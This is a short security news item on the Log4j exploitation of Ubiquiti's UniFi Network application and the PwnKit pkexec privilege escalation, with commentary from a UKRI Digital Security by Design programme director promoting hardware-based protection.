At the beginning of this week, it was reported that yet another application has been targeted by a customised exploit for the Log4j vulnerability. Researchers at Morphisec announced that Ubiquiti’s UniFi Network applications are vulnerable to the exploit, with the first successful exploitation being tracked back to 20th January 2022.
UniFi Network is an application that can help devices running macOS, Linux and Windows operating systems to set up and manage UniFi Network devices, while also providing an overview of the network and controlling it.
In the UniFi Network Application, the vulnerability is tracked as CVE-2021-44228, which has a CVSS score of 10, but so far it has only been identified in versions prior to UniFi Network Application 6.5.54. This critical vulnerability is dangerous as it enables malicious actors to complete remote code execution, but what is most worrying is that the command-and-control server in the attack is correlated to a previous SolarWinds attack, reported by CrowdStrike.
Discussing the discovery of this vulnerability, and covered by the entire InfoRiskToday UK, and the entire ISMG estate, John Goodacre, director of the UKRI’s Digital Security by Design challenge and Professor of Computer Architectures at Manchester University, said
“The continued use of known vulnerabilities shows the complexity on both system administrators and software suppliers to keep up with the need to patch. Given the historic investment and likely hood developers will continue to create vulnerable code, it’s important everyone understands how future hardware can help protect software from exploitation by design, and that developers are provided additional tools and capabilities that bring down the costs of delivering products secured by default. The UKRI Digital Security by Design (DSbD) programme is supporting industry to deliver new underpinning technologies with the recently announce DSbD Technology Access programme offering developers the opportunity to understand and evaluate the resulting benefits to their business.”
Another piece of research that caught our eye was the discovery of a memory corruption vulnerability, tracked as CVE-2021-4034, also known as Pwnkit. Researchers at Qualys discovered the vulnerability in polkit’s pkexec, a SUID-root program installed on all Linux distributions by default, which when exploited allows unprivileged users full root privileges on a vulnerable host. This vulnerability is especially worrying because pkexec, which is a part of Polkit, provides the foundation for critical software running on servers, phones and the Linux kernel.
Commenting on this, John said, “privilege escalation vulnerabilities such as this are a major weapon in the cyber attacker’s arsenal. Although this bug is independently described as a local privilege escalation, they also permit an attacker to extend the harm initiated via another vulnerability in a specific application and its data, to all data in the machine, and potentially the network.
For decades computers have provided just a few levels of privilege, with software finding it too slow and expensive to use these mechanisms to create more secured solutions. The UKRI Digital Security by Design (DSbD) programme recently announced its Technology Access Programme to offer technology businesses the opportunity to investigate the benefits of the DSbD technology. These technologies are able to provide an arbitrary number of privilege and hardware protected compartments while also providing protection against the exploitation of vulnerabilities.”
Follow Innovate UK